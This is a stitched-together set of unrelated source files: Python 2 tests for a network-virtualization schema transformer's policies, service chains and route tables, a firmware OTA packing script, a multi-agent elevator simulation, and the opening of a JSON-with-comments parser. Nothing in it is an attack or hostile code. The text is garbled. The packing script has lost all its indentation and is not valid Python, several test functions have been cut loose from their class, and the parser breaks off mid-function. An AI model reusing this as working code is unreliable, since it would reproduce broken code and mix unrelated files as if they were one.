            print "failed : routing instance state is not correct... ", test_common.lineno()
            self.assertTrue(False)
        # A third network attached to np2 should also get connected to vn1.
        vn3_obj = VirtualNetwork(vn3_name)
        vn3_obj.set_network_policy(np2, vnp)
        vn3_uuid = self._vnc_lib.virtual_network_create(vn3_obj)
        try:
            self.check_ri_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn3', 'vn3'],
                                          to_fq_name=[u'default-domain', u'default-project', u'vn1', u'vn1'])
        except NoIdError, e:
            print "failed : routing instance state is not correct... ", test_common.lineno()
            self.assertTrue(False)
        vn3_obj.del_network_policy(np2)
        self._vnc_lib.virtual_network_update(vn3_obj)

        @retries(5, hook=retry_exc_handler)
        def _match_acl_rule():
            # After detaching vn3 from np2, no ACL rule on vn1 should
            # still target vn3.
            acl = self._vnc_lib.access_control_list_read(
                fq_name=[u'default-domain', u'default-project',
                         'vn1', 'vn1'])
            for rule in acl.get_access_control_list_entries().get_acl_rule():
                if rule.match_condition.dst_address.virtual_network == vn3_obj.get_fq_name_str():
                    raise Exception("ACL rule still present")
        _match_acl_rule()

        vn1_obj.del_network_policy(np1)
        vn2_obj.del_network_policy(np2)
        self._vnc_lib.virtual_network_update(vn1_obj)
        self._vnc_lib.virtual_network_update(vn2_obj)
        self.delete_network_policy(np1)
        self.delete_network_policy(np2)
        self._vnc_lib.virtual_network_delete(fq_name=vn1_obj.get_fq_name())
        self._vnc_lib.virtual_network_delete(fq_name=vn2_obj.get_fq_name())
        self._vnc_lib.virtual_network_delete(fq_name=vn3_obj.get_fq_name())
        try:
            self.check_vn_is_deleted(uuid=vn1_obj.uuid)
        except Exception, e:
            print "failed : vn1 is still present in api server ... ", test_common.lineno()
            self.assertTrue(False)
    # end test_multiple_policy

    def test_service_policy(self):
        # Policy with a service instance ("s1") between vn1 and vn2:
        # verify the service-chain routing instances and advertised prefix.
        # create vn1
        vn1_obj = VirtualNetwork('vn1')
        ipam_obj = NetworkIpam('ipam1')
        self._vnc_lib.network_ipam_create(ipam_obj)
        vn1_obj.add_network_ipam(ipam_obj, VnSubnetsType(
            [IpamSubnetType(SubnetType("10.0.0.0", 24))]))
        self._vnc_lib.virtual_network_create(vn1_obj)
        # create vn2
        vn2_obj = VirtualNetwork('vn2')
        ipam_obj = NetworkIpam('ipam2')
        self._vnc_lib.network_ipam_create(ipam_obj)
        vn2_obj.add_network_ipam(ipam_obj, VnSubnetsType(
            [IpamSubnetType(SubnetType("172.16.17.32", 24))]))
        self._vnc_lib.virtual_network_create(vn2_obj)
        np = self.create_network_policy(vn1_obj, vn2_obj, ["s1"])
        seq = SequenceType(1, 1)
        vnp = VirtualNetworkPolicyType(seq)
        vn1_obj.clear_pending_updates()
        vn2_obj.clear_pending_updates()
        vn1_obj.set_network_policy(np, vnp)
        vn2_obj.set_network_policy(np, vnp)
        self._vnc_lib.virtual_network_update(vn1_obj)
        self._vnc_lib.virtual_network_update(vn2_obj)
        try:
            sc = self.wait_to_get_sc()
            sc_ri_name = 'service-'+sc[0]+'-default-domain_default-project_s1'
        except Exception, e:
            print "failed: unable to fetch to_bgp.service_chain"
            self.assertTrue(False)
        try:
            self.check_ri_rt_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
                                             to_fq_name=[u'default-domain', u'default-project', u'vn1', sc_ri_name], expect_to_find=True)
        except NoIdError, e:
            print "failed : routing instance state is not correct... ", test_common.lineno()
            self.assertTrue(False)
        try:
            self.check_ri_rt_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn2', sc_ri_name],
                                             to_fq_name=[u'default-domain', u'default-project', u'vn2', u'vn2'], expect_to_find=True)
        except NoIdError, e:
            print "failed : routing instance state is not correct... ", test_common.lineno()
            self.assertTrue(False)
        try:
            self.check_service_chain_prefix_match(fq_name=[u'default-domain', u'default-project', 'vn2', sc_ri_name],
                                                  prefix='10.0.0.0/24')
        except NoIdError, e:
            print "failed : routing instance state is not correct... ", test_common.lineno()
            self.assertTrue(False)
        # Teardown and cleanup verification.
        vn1_obj.del_network_policy(np)
        vn2_obj.del_network_policy(np)
        self._vnc_lib.virtual_network_update(vn1_obj)
        self._vnc_lib.virtual_network_update(vn2_obj)
        try:
            self.check_ri_refs_are_deleted(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'])
        except Exception, e:
            print "failed : ri refs are still present in routing instance [vn2]... ", test_common.lineno()
            self.assertTrue(False)
        self.delete_network_policy(np)
        self._vnc_lib.virtual_network_delete(fq_name=vn1_obj.get_fq_name())
        self._vnc_lib.virtual_network_delete(fq_name=vn2_obj.get_fq_name())
        try:
            self.check_vn_is_deleted(uuid=vn1_obj.uuid)
        except Exception, e:
            print "failed : vn1 is still present in api server ... ", test_common.lineno()
            self.assertTrue(False)
        try:
            self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'])
        except Exception, e:
            print "failed : ri1 is still present in api server ... ", test_common.lineno()
            self.assertTrue(False)
    # end test_service_policy
# end class TestPolicy
#class TestRouteTable(test_case.STTestCase):
def test_add_delete_route(self):
    """Attach a route table with a default route to vn100, verify the static
    route and route-target propagation into the left VN's service routing
    instance, then clear the routes and verify cleanup.

    Fixes three defects in the original:
    * the inner ``lvn = self._vnc_lib...read(id=lvn.uuid)`` rebinding made
      ``lvn`` local to ``_match_route_table`` and raised UnboundLocalError;
    * ``sc_ri_name``/``rt100`` were locals of ``_match_route_table`` and
      unavailable (NameError) inside ``_match_route_table_cleanup``;
    * ``rt.set_routes(route)`` passed a single RouteType where the emptied
      RouteTableType (``routes``) was intended, so routes were never cleared.
    """
    lvn = self.create_virtual_network("lvn", "10.0.0.0/24")
    rvn = self.create_virtual_network("rvn", "172.16.17.32/24")
    np = self.create_network_policy(lvn, rvn, ["s1"], "in-network")
    vn = self.create_virtual_network("vn100", "1.0.0.0/24")
    # Attach a route table with a single default route whose next hop is the
    # service instance.
    rt = RouteTable("rt1")
    self._vnc_lib.route_table_create(rt)
    vn.add_route_table(rt)
    self._vnc_lib.virtual_network_update(vn)
    routes = RouteTableType()
    route = RouteType(
        prefix="0.0.0.0/0", next_hop="default-domain:default-project:s1")
    routes.add_route(route)
    rt.set_routes(routes)
    self._vnc_lib.route_table_update(rt)

    @retries(5, hook=retry_exc_handler)
    def _match_route_table():
        # Refresh the left VN; bind to a fresh name so the outer ``lvn``
        # stays visible inside this closure (the original rebinding raised
        # UnboundLocalError).
        lvn_read = self._vnc_lib.virtual_network_read(id=lvn.uuid)
        sc = [x for x in to_bgp.ServiceChain]
        if len(sc) == 0:
            raise Exception("sc has 0 len")
        sc_ri_name = 'service-'+sc[0]+'-default-domain_default-project_s1'
        lri = self._vnc_lib.routing_instance_read(
            fq_name=['default-domain', 'default-project', 'lvn', sc_ri_name])
        sr = lri.get_static_route_entries()
        if sr is None:
            raise Exception("sr is None")
        route = sr.route[0]
        self.assertEqual(route.prefix, "0.0.0.0/0")
        self.assertEqual(route.next_hop, "10.0.0.253")
        ri100 = self._vnc_lib.routing_instance_read(
            fq_name=[
                'default-domain', 'default-project', 'vn100', 'vn100'])
        rt100 = ri100.get_route_target_refs()[0]['to']
        for rt_ref in lri.get_route_target_refs() or []:
            if rt100 == rt_ref['to']:
                # Hand the names needed by the cleanup matcher back to the
                # enclosing scope.
                return sc_ri_name, rt100
        raise Exception("rt100 route-target ref not found")
    # NOTE(review): assumes the @retries decorator propagates the wrapped
    # function's return value -- verify against its definition.
    sc_ri_name, rt100 = _match_route_table()

    # Clear the route list; pass the (now empty) RouteTableType, not the
    # individual RouteType as the original did.
    routes.set_route([])
    rt.set_routes(routes)
    self._vnc_lib.route_table_update(rt)

    @retries(5, hook=retry_exc_handler)
    def _match_route_table_cleanup():
        lri = self._vnc_lib.routing_instance_read(
            fq_name=['default-domain', 'default-project', 'lvn', sc_ri_name])
        sr = lri.get_static_route_entries()
        if sr and sr.route:
            raise Exception("sr has route")
        ri = self._vnc_lib.routing_instance_read(
            fq_name=['default-domain', 'default-project', 'lvn', 'lvn'])
        for rt_ref in ri.get_route_target_refs() or []:
            if rt100 == rt_ref['to']:
                raise Exception("rt100 route-target ref found")
    _match_route_table_cleanup()

    # Tear everything down.
    self._vnc_lib.virtual_network_delete(
        fq_name=['default-domain', 'default-project', 'vn100'])
    self.delete_network_policy(np, auto_policy=True)
    gevent.sleep(2)
    self._vnc_lib.virtual_network_delete(
        fq_name=['default-domain', 'default-project', 'lvn'])
    self._vnc_lib.virtual_network_delete(
        fq_name=['default-domain', 'default-project', 'rvn'])
# test_add_delete_route
def test_vn_delete(self):
    """Verify that a VN deleted while the schema transformer is down is
    cleaned up (both the VN and its routing instance) once the transformer
    is restarted."""
    vn = self.create_virtual_network("vn", "10.1.1.0/24")
    gevent.sleep(2)
    for obj in [vn]:
        ident_name = self.get_obj_imid(obj)
        # the VN identity must have been published into the ifmap graph
        ifmap_ident = self.assertThat(FakeIfmapClient._graph, Contains(ident_name))
    try:
        self.check_vn_ri_state(fq_name=[u'default-domain', u'default-project', 'vn', 'vn'])
    except NoIdError, e:
        print "failed : routing instance state is not created ... ", test_common.lineno()
        self.assertTrue(False)
    # stop st
    self._st_greenlet.kill()
    gevent.sleep(5)
    # delete vn in api server while the transformer is down
    self._vnc_lib.virtual_network_delete(
        fq_name=['default-domain', 'default-project', 'vn'])
    # start st on a free port; on startup it must reconcile the deletion
    self._st_greenlet = gevent.spawn(test_common.launch_schema_transformer,
        self._api_server_ip, self._api_server_port)
    gevent.sleep(2)
    # check if vn is deleted
    try:
        self.check_vn_is_deleted(uuid=vn.uuid)
    except Exception, e:
        print "failed : vn is still present in api server ... ", test_common.lineno()
        self.assertTrue(False)
    # check if ri is deleted
    try:
        self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn', 'vn'])
    except Exception, e:
        print "failed : routing instance is still present in api server ... ", test_common.lineno()
        self.assertTrue(False)
# test_vn_delete
@retries(5, hook=retry_exc_handler)
def check_vn_ri_state(self, fq_name):
    # Succeeds once the routing instance exists; routing_instance_read
    # raises NoIdError (triggering a retry) until then.
    ri = self._vnc_lib.routing_instance_read(fq_name)
def test_policy_with_cidr(self):
    """Attach a policy whose rules use CIDR destinations to vn1 and verify
    that the generated ACL entries match both /32 prefixes."""
    vn1 = self.create_virtual_network("vn1", "10.1.1.0/24")
    vn2 = self.create_virtual_network("vn2", "10.2.1.0/24")
    rules = []
    # Two deny rules from vn1 towards single-host CIDR destinations.
    rule1 = { "protocol": "icmp",
              "direction": "<>",
              "src-port": "any",
              "src": {"type": "vn", "value": vn1},
              "dst": {"type": "cidr", "value": "10.2.1.1/32"},
              "dst-port": "any",
              "action": "deny"
              }
    rule2 = { "protocol": "icmp",
              "direction": "<>",
              "src-port": "any",
              "src": {"type": "vn", "value": vn1},
              "dst": {"type": "cidr", "value": "10.2.1.2/32"},
              "dst-port": "any",
              "action": "deny"
              }
    rules.append(rule1)
    rules.append(rule2)
    np = self.create_network_policy_with_multiple_rules(rules)
    seq = SequenceType(1, 1)
    vnp = VirtualNetworkPolicyType(seq)
    vn1.set_network_policy(np, vnp)
    self._vnc_lib.virtual_network_update(vn1)
    for obj in [vn1]:
        ident_name = self.get_obj_imid(obj)
        gevent.sleep(2)
        # the VN identity must be present in the ifmap graph
        ifmap_ident = self.assertThat(FakeIfmapClient._graph, Contains(ident_name))
    try:
        self.check_vn_ri_state(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'])
    except NoIdError, e:
        print "failed : Routing instance state is not correct... ", test_common.lineno()
        self.assertTrue(False)
    try:
        # both CIDR destinations must show up in vn1's ACL
        self.check_acl_match_dst_cidr(
            fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
            ip_prefix="10.2.1.1", ip_len=32)
        self.check_acl_match_dst_cidr(
            fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
            ip_prefix="10.2.1.2", ip_len=32)
    except NoIdError, e:
        print "failed : acl match cidr... ", test_common.lineno()
        self.assertTrue(False)
    except Exception, e:
        print "failed : acl match cidr... ", test_common.lineno()
        self.assertTrue(False)
    # cleanup
    self.delete_network_policy(np, auto_policy=True)
    self._vnc_lib.virtual_network_delete(
        fq_name=['default-domain', 'default-project', 'vn1'])
# test st restart while service chain is configured
def test_st_restart_service_chain_delete(self):
    """Configure a service chain between vn1 and vn2, kill the schema
    transformer, delete the policy and networks while it is down, then
    restart it and verify all routing instances are cleaned up."""
    # create vn1
    vn1_obj = VirtualNetwork('vn1')
    ipam_obj = NetworkIpam('ipam1')
    self._vnc_lib.network_ipam_create(ipam_obj)
    vn1_obj.add_network_ipam(ipam_obj, VnSubnetsType(
        [IpamSubnetType(SubnetType("10.0.0.0", 24))]))
    self._vnc_lib.virtual_network_create(vn1_obj)
    # create vn2
    vn2_obj = VirtualNetwork('vn2')
    ipam_obj = NetworkIpam('ipam2')
    self._vnc_lib.network_ipam_create(ipam_obj)
    vn2_obj.add_network_ipam(ipam_obj, VnSubnetsType(
        [IpamSubnetType(SubnetType("172.16.17.32", 24))]))
    self._vnc_lib.virtual_network_create(vn2_obj)
    # wire both networks through service s1 via a network policy
    np = self.create_network_policy(vn1_obj, vn2_obj, ["s1"])
    seq = SequenceType(1, 1)
    vnp = VirtualNetworkPolicyType(seq)
    vn1_obj.clear_pending_updates()
    vn2_obj.clear_pending_updates()
    vn1_obj.set_network_policy(np, vnp)
    vn2_obj.set_network_policy(np, vnp)
    self._vnc_lib.virtual_network_update(vn1_obj)
    self._vnc_lib.virtual_network_update(vn2_obj)
    try:
        sc = self.wait_to_get_sc()
        sc_ri_name = 'service-'+sc[0]+'-default-domain_default-project_s1'
    except Exception, e:
        print "failed: unable to fetch to_bgp.service_chain"
        self.assertTrue(False)
    try:
        # vn1's primary RI must be connected to the service RI
        self.check_ri_rt_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
            to_fq_name=[u'default-domain', u'default-project', u'vn1', sc_ri_name], expect_to_find=True)
    except NoIdError, e:
        print "failed : routing instance state is not correct... ", test_common.lineno()
        self.assertTrue(False)
    try:
        # vn2's service RI must be connected back to vn2's primary RI
        self.check_ri_rt_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn2', sc_ri_name],
            to_fq_name=[u'default-domain', u'default-project', u'vn2', u'vn2'], expect_to_find=True)
    except NoIdError, e:
        print "failed : routing instance state is not correct... ", test_common.lineno()
        self.assertTrue(False)
    # stop st
    self._st_greenlet.kill()
    gevent.sleep(5)
    # remove the policy and networks while the transformer is down
    vn1_obj.del_network_policy(np)
    vn2_obj.del_network_policy(np)
    self._vnc_lib.virtual_network_update(vn1_obj)
    self._vnc_lib.virtual_network_update(vn2_obj)
    try:
        self.check_ri_refs_are_deleted(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'])
    except Exception, e:
        print "failed : ri refs are still present in routing instance [vn1]... ", test_common.lineno()
        self.assertTrue(False)
    self.delete_network_policy(np)
    self._vnc_lib.virtual_network_delete(fq_name=vn1_obj.get_fq_name())
    self._vnc_lib.virtual_network_delete(fq_name=vn2_obj.get_fq_name())
    try:
        self.check_vn_is_deleted(uuid=vn1_obj.uuid)
    except Exception, e:
        print "failed : vn1 is still present in api server ... ", test_common.lineno()
        self.assertTrue(False)
    # start st on a free port; it must reconcile the deletions on startup
    self._st_greenlet = gevent.spawn(test_common.launch_schema_transformer,
        self._api_server_ip, self._api_server_port)
    gevent.sleep(4)
    # check if all ri's are deleted
    try:
        self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'])
        self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'])
        self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn1', sc_ri_name])
        self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', sc_ri_name])
    except Exception, e:
        print "failed : ri instances are still present in api server ... ", test_common.lineno()
        self.assertTrue(False)
# end
# test service chain configuration while st is restarted
def test_st_restart_service_chain(self):
    """Configure a service chain, restart the schema transformer, and verify
    the chain state is rebuilt correctly; then tear everything down."""
    # create vn1
    vn1_obj = VirtualNetwork('vn1')
    ipam_obj = NetworkIpam('ipam1')
    self._vnc_lib.network_ipam_create(ipam_obj)
    vn1_obj.add_network_ipam(ipam_obj, VnSubnetsType(
        [IpamSubnetType(SubnetType("10.0.0.0", 24))]))
    self._vnc_lib.virtual_network_create(vn1_obj)
    # create vn2
    vn2_obj = VirtualNetwork('vn2')
    ipam_obj = NetworkIpam('ipam2')
    self._vnc_lib.network_ipam_create(ipam_obj)
    vn2_obj.add_network_ipam(ipam_obj, VnSubnetsType([IpamSubnetType(SubnetType("172.16.17.32", 24))]))
    self._vnc_lib.virtual_network_create(vn2_obj)
    # wire both networks through service s1 via a network policy
    np = self.create_network_policy(vn1_obj, vn2_obj, ["s1"])
    seq = SequenceType(1, 1)
    vnp = VirtualNetworkPolicyType(seq)
    vn1_obj.clear_pending_updates()
    vn2_obj.clear_pending_updates()
    vn1_obj.set_network_policy(np, vnp)
    vn2_obj.set_network_policy(np, vnp)
    self._vnc_lib.virtual_network_update(vn1_obj)
    self._vnc_lib.virtual_network_update(vn2_obj)
    # stop st and wait for sometime
    self._st_greenlet.kill()
    gevent.sleep(5)
    # start st on a free port
    self._st_greenlet = gevent.spawn(test_common.launch_schema_transformer,
        self._api_server_ip, self._api_server_port)
    gevent.sleep(4)
    # check service chain state after the restart
    try:
        sc = self.wait_to_get_sc()
        sc_ri_name = 'service-'+sc[0]+'-default-domain_default-project_s1'
    except Exception, e:
        print "failed: unable to fetch to_bgp.service_chain"
        self.assertTrue(False)
    try:
        self.check_ri_rt_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'],
            to_fq_name=[u'default-domain', u'default-project', u'vn1', sc_ri_name], expect_to_find=True)
    except NoIdError, e:
        print "failed : routing instance state is not correct... ", test_common.lineno()
        self.assertTrue(False)
    try:
        self.check_ri_rt_state_vn_policy(fq_name=[u'default-domain', u'default-project', 'vn2', sc_ri_name],
            to_fq_name=[u'default-domain', u'default-project', u'vn2', u'vn2'], expect_to_find=True)
    except NoIdError, e:
        print "failed : routing instance state is not correct... ", test_common.lineno()
        self.assertTrue(False)
    # cleanup
    vn1_obj.del_network_policy(np)
    vn2_obj.del_network_policy(np)
    self._vnc_lib.virtual_network_update(vn1_obj)
    self._vnc_lib.virtual_network_update(vn2_obj)
    try:
        self.check_ri_refs_are_deleted(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'])
    except Exception, e:
        print "failed : ri refs are still present in routing instance [vn1]... ", test_common.lineno()
        self.assertTrue(False)
    self.delete_network_policy(np)
    self._vnc_lib.virtual_network_delete(fq_name=vn1_obj.get_fq_name())
    self._vnc_lib.virtual_network_delete(fq_name=vn2_obj.get_fq_name())
    try:
        self.check_vn_is_deleted(uuid=vn1_obj.uuid)
    except Exception, e:
        print "failed : vn1 is still present in api server ... ", test_common.lineno()
        self.assertTrue(False)
    # check if all ri's are deleted
    try:
        self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn1', 'vn1'])
        self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', 'vn2'])
        self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn1', sc_ri_name])
        self.check_ri_is_deleted(fq_name=[u'default-domain', u'default-project', 'vn2', sc_ri_name])
    except Exception, e:
        print "failed : ri instances are still present in api server ... ", test_common.lineno()
        self.assertTrue(False)
# end
# end class TestRouteTable
|
#!/usr/bin/python
import string
import sys
import os
import re
import binascii
import struct
import zlib
# Global checksum accumulator.
# NOTE(review): never updated or read in this file -- confirm before removing.
chksum = 0
# Block/alignment size in bytes; the header occupies one block and fw1 is
# padded to a multiple of this size.
FILE_READ_SIZE=512
def write_file(file_name,data):
if file_name is None:
print 'file_name cannot be none\n'
sys.exit(0)
fp = open(file_name,'ab')
if fp:
fp.seek(0,os.SEEK_END)
fp.write(data)
fp.close()
else:
print '%s write fail\n'%(file_name)
def packotabin():
if len(sys.argv) != 5:
print 'Usage: pack_ota_bin.py fw1.bin fw2.bin -o http_ota_fw_v100.bin'
sys.exit(0)
fw_updata1=sys.argv[1]
fw_updata2=sys.argv[2]
destfile=sys.argv[4]
#print 'fw_updata1=%s \n'%(fw_updata1)
#print 'fw_updata2=%s \n'%(fw_updata2)
if os.path.exists(destfile):
cmd='rm ' + destfile
os.system(cmd)
pSrcFd1 = open(fw_updata1, 'rb')
if pSrcFd1 is None:
print '%s cannot be open\n' % fw_updata1
sys.exit(0)
pSrcFd1.seek(0,os.SEEK_END)
fw1_length = pSrcFd1.tell()
pSrcFd1.seek(0,os.SEEK_SET)
pSrcFd2 = open(fw_updata2, 'rb')
if pSrcFd2 is None:
print '%s cannot be open\n' % fw_updata2
sys.exit(0)
#print 'fw1_length=%d \n'%(fw1_length)
pSrcFd2.seek(0,os.SEEK_END)
fw2_length = pSrcFd2.tell()
pSrcFd2.seek(0,os.SEEK_SET)
#print 'fw2_length=%d \n'%(fw2_length)
#file_total_length = fw2_length + fw1_length
paddingfw1_length = 0
paddingfw2_length = 0
if fw1_length % FILE_READ_SIZE:
paddingfw1_length = FILE_READ_SIZE - (fw1_length % FILE_READ_SIZE)
if fw2_length % FILE_READ_SIZE:
paddingfw2_length = FILE_READ_SIZE - (fw2_length % FILE_READ_SIZE)
magic_data0 = 0x5a
magic_data1 = 0x47
version = 4338
fw1_length = fw1_length + paddingfw1_length
fw2_length = fw2_length
reserved=0x0
header = struct.pack('<BBHIIIIII', int(magic_data0), int(magic_data1),int(version), int(reserved), int(reserved), int(reserved), int(reserved), int(fw1_length),int(fw2_length))
write_file(destfile, header)
data_str = ['00']*(FILE_READ_SIZE - 28)
data_bin = binascii.a2b_hex(''.join(data_str))
write_file(destfile, data_bin)
data_bin= pSrcFd1.read(int(fw1_length))
write_file(destfile, data_bin)
if paddingfw1_length:
data_str = ['00']*(int(paddingfw1_length))
data_bin = binascii.a2b_hex(''.join(data_str))
write_file(destfile, data_bin)
data_bin= pSrcFd2.read(int(fw2_length))
write_file(destfile, data_bin)
pSrcFd1.close()
pSrcFd2.close()
if __name__=='__main__':
    # Script entry point: pack the two firmware images named on the command line.
    packotabin()
|
import numpy as np
import sys
import os
#print(os.getcwd())
import random
import copy
from envs.ElevatorENV.gridworld import Grid
class Lift():
    """Multi-agent elevator environment wrapping the ElevatorENV ``Grid``."""
    def __init__(self, agent_num, height):
        # number of agents and number of floors
        self.agent_num = agent_num
        self.height = height
        # per-agent observation size: self-pos grid + other-pos grid + busy flag
        # NOTE(review): computed but never stored or used -- confirm intent.
        obs_dim = height*4+1
        # discrete actions available to each agent
        self.action_range = [0, 1, 2]
        # occupancy grid (height x 2), filled by reset()
        self.grid = []
        # per-agent busy flags keyed by agent name ("Ag1", "Ag2", ...)
        self.busy_n = {}
    def get_game_list(self):
        pass
    def get_rewards(self):
        pass
    def step(self, action_n):
        """Advance the underlying grid one step using the joint action.

        Returns (obs_n, rewards cast to int, done flags, info dict whose
        "new_act" entry holds the actions actually executed).
        """
        obs_n = []
        reward_n = []
        done_n = [False]*self.agent_num
        info_n = {"new_act": []}
        # the Grid performs the transition and reports the new state
        grid1, busy_n, obs_n, true_act_n, reward_n = self.elevator.run_a_step(action_n)
        self.grid = grid1
        self.busy_n = busy_n
        info_n["new_act"] = true_act_n
        ## change grid
        ## new action
        reward_x = [int(x) for x in reward_n]
        return obs_n, reward_x, done_n, info_n
    def trans_obs(self, pos):
        """Build a flat observation for the agent at grid position ``pos``:
        a one-hot self-position grid concatenated with the other-agents grid."""
        shape = self.grid.shape[0]*self.grid.shape[1]
        selfpos = np.zeros((self.grid.shape[0], self.grid.shape[1]))
        selfpos[pos] = 1
        selfpos = np.reshape(selfpos, shape)
        grid1 = copy.deepcopy(self.grid)
        # remove self from the copy so it only contains the other agents
        grid1[pos] = 0
        otherpos = np.reshape(grid1, shape)
        inputarr = np.hstack((selfpos, otherpos))
        return inputarr
    def reset(self):
        """Randomly place the agents on the grid, rebuild the Grid world, and
        return the per-agent initial observations."""
        ## obser_n
        ## each agent only receives a partial observation
        arr = np.zeros(self.height*2)
        num = self.agent_num  # self.height-3
        # choose `num` distinct cells of the flattened (height x 2) grid
        inx = random.sample(range(0, self.height*2), num)
        arr[inx] = 1
        arr = np.reshape(arr, (self.height, 2))
        self.grid = arr
        obs_n = []
        namelist = []
        k2 = 1
        for i in range(self.height):
            for j in range(2):
                if self.grid[i, j] != 0:
                    inputarr0 = self.trans_obs((i, j))
                    # alternate busy flags: odd-numbered agents start busy
                    if (k2 % 2 == 0):
                        busy = 0
                    else:
                        busy = 1
                    self.busy_n["Ag"+str(k2)] = busy
                    obs_n.append(np.hstack((inputarr0, np.array([busy]))))
                    namelist.append("Ag"+str(k2))
                    k2 += 1
        ### create a grid world
        ## combine grid and busy
        self.elevator = Grid(self.grid, self.busy_n, self.agent_num, namelist)
        return obs_n
    def terminate(self):
        pass
    def render(self):
        print("ohhhhhhh")
def rule_agent(height, obs):
    """Hand-coded policy for one elevator agent.

    ``obs`` layout: self-pos grid (height*2), other-pos grid (height*2),
    busy flag.  Returns an action in {0, 1, 2}.

    Fixes the original top-floor branch, which did ``return action, None,
    flag`` with ``flag`` undefined (NameError) and ``action`` unassigned,
    and whose 3-tuple arity disagreed with every other return path.
    """
    s1 = obs[:height * 2]
    s2 = obs[height * 2:4 * height]
    busy = obs[-1]
    selfpos = s1.reshape((height, 2))
    otherpos = s2.reshape((height, 2))
    grid = selfpos + otherpos
    print(" grid ", grid)
    pos = np.where(selfpos == 1)
    # index the size-1 arrays explicitly (int() on an ndarray is deprecated)
    x = int(pos[0][0])
    y = int(pos[1][0])
    print(" pos ", x, y)
    if busy == 1:
        if x == len(grid) - 1:
            # already at the top floor: keep moving-action 2
            return 2
        if (grid[x + 1, y] == 1 and y == 1):
            action = 1
        else:
            action = 2
    else:
        if y == 0:
            action = 1
        else:
            action = 0
    return action
def getPos(state, hei):
    """Split a flat observation into (busy flag, own-position index arrays)."""
    busy = state[-1]
    own_grid = state[:hei * 2].reshape((hei, 2))
    return busy, np.where(own_grid == 1)
if __name__ == "__main__":
    # Smoke test: 4 agents on a 5-floor grid, one no-op joint step.
    lift = Lift(4, 5)
    obs_n = lift.reset()
    lift.elevator.printGrid()
    obs_n, reward_x, done_n, info_n = lift.step(np.array([0, 0, 0, 0]))
    lift.elevator.printGrid()
    print("obs_n[0]....", obs_n[0])
    # report each agent's busy flag and column after the step
    for obs in obs_n:
        busy, pos = getPos(obs, 5)
        print("busy...", int(busy), "coordination...", pos[1][0])
        print("=====")
|
<reponame>jriddle-linode/splunk-addon-linode<filename>TA-linode/bin/ta_linode/aob_py3/jsoncomment/comments.py<gh_stars>10-100
#!/bin/python
# coding: utf-8
##########################################################################################################################################
# For templating
import re
# The parser
try:
import ujson as json
except ImportError:
import json
# For templating
from jsonspec.pointer import extract, ExtractError
# The wrapper base class
from .wrapper import GenericWrapper
##########################################################################################################################################
# Comments: prefixes that mark a whole-line comment
COMMENT_PREFIX = ("#",";","//")
# Multi-line comment delimiters
MULTILINE_START = "/*"
MULTILINE_END = "*/"
# Data strings: triple quotes delimit a multi-line string value
LONG_STRING = '"""'
# JSON Pointer template, e.g. {{/path/to/value}}
TEMPLATE_RE = re.compile(r"\{\{(.*?)\}\}")
##########################################################################################################################################
class JsonComment(GenericWrapper):
    """Wrapper around a json-compatible parser that accepts comments,
    triple-quoted multi-line strings, trailing commas, and JSON Pointer
    ``{{...}}`` templates in string values."""

    def __init__(self, wrapped=json):
        super().__init__(wrapped)

    # Loads a JSON string with comments
    # Allows to expand the JSON Pointer templates
    def loads(self, jsonsc, *args, template=True, **kwargs):
        """Parse a JSON string that may contain comments; when ``template``
        is true, expand {{/json/pointer}} templates in string values."""
        # Splits the string in lines
        lines = jsonsc.splitlines()
        # Process the lines to remove commented ones
        jsons = self._preprocess(lines)
        # Calls the wrapped to parse JSON
        self.obj = self.wrapped.loads(jsons, *args, **kwargs)
        # If there are templates, subs them
        if template:
            self._templatesub(self.obj)
        return self.obj

    # Loads a JSON opened file with comments
    def load(self, jsonf, *args, **kwargs):
        """Parse an already-open text file object via :meth:`loads`."""
        return self.loads(jsonf.read(), *args, **kwargs)

    # Opens a JSON file with comments
    # Allows a default value if loading or parsing fails
    def loadf(self, path, *args, default=None, **kwargs):
        """Parse the JSON file at ``path``; return ``default`` on parse failure.

        The file is opened in append+read mode so a missing file is created
        empty instead of raising."""
        json_obj = default
        with open(path, mode="a+", encoding="UTF-8") as jsonf:
            try:
                # Back to file start (append mode positions at EOF)
                jsonf.seek(0)
                json_obj = self.load(jsonf, *args, **kwargs)
            # If parsing fails, the default value is kept
            except ValueError:
                pass
        return json_obj

    # Saves a JSON file with indentation
    def dumpf(self, json_obj, path, *args, indent=4, escape_forward_slashes=False, **kwargs):
        """Serialize ``json_obj`` to ``path`` with indentation.

        ``escape_forward_slashes`` exists only in ujson; the standard json
        module raises TypeError for the unknown keyword, in which case the
        dump is retried without it."""
        with open(path, mode="w", encoding="UTF-8") as jsonf:
            try:
                json.dump(json_obj, jsonf, *args, indent=indent, escape_forward_slashes=escape_forward_slashes, **kwargs)
            except TypeError:
                json.dump(json_obj, jsonf, *args, indent=indent, **kwargs)

    # Reads lines and skips comments
    def _preprocess(self, lines):
        """Join ``lines`` into standard JSON, dropping comment lines/blocks,
        converting triple-quote string delimiters, and removing trailing
        commas."""
        standard_json = ""
        is_multiline = False
        keep_trail_space = 0
        for line in lines:
            # 0 if there is no trailing space, 1 otherwise
            keep_trail_space = int(line.endswith(" "))
            # Remove all whitespace on both sides
            line = line.strip()
            # Skip blank lines
